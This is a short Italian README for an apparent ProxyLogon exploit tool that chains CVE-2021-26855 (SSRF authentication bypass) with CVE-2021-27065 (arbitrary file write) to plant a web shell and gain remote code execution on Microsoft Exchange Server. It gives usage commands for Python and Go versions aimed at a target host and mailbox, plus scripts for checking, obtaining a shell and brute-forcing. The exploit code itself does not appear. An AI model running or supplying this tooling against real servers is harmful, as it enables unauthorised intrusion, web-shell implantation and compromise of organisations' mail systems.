
ProxyLogon (CVE-2021-26855+CVE-2021-27065) RCE su Exchange Server (SSRF->GetWebShell)
ProxyLogon è il nome generico formale per CVE-2021-26855, una vulnerabilità in Microsoft Exchange Server che consente a un attaccante di bypassare l'autenticazione e di impersonare l'amministratore. Abbiamo anche concatenato questo bug con un'altra vulnerabilità post-autenticazione di scrittura arbitraria di file, CVE-2021-27065, per ottenere l'esecuzione di codice.
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py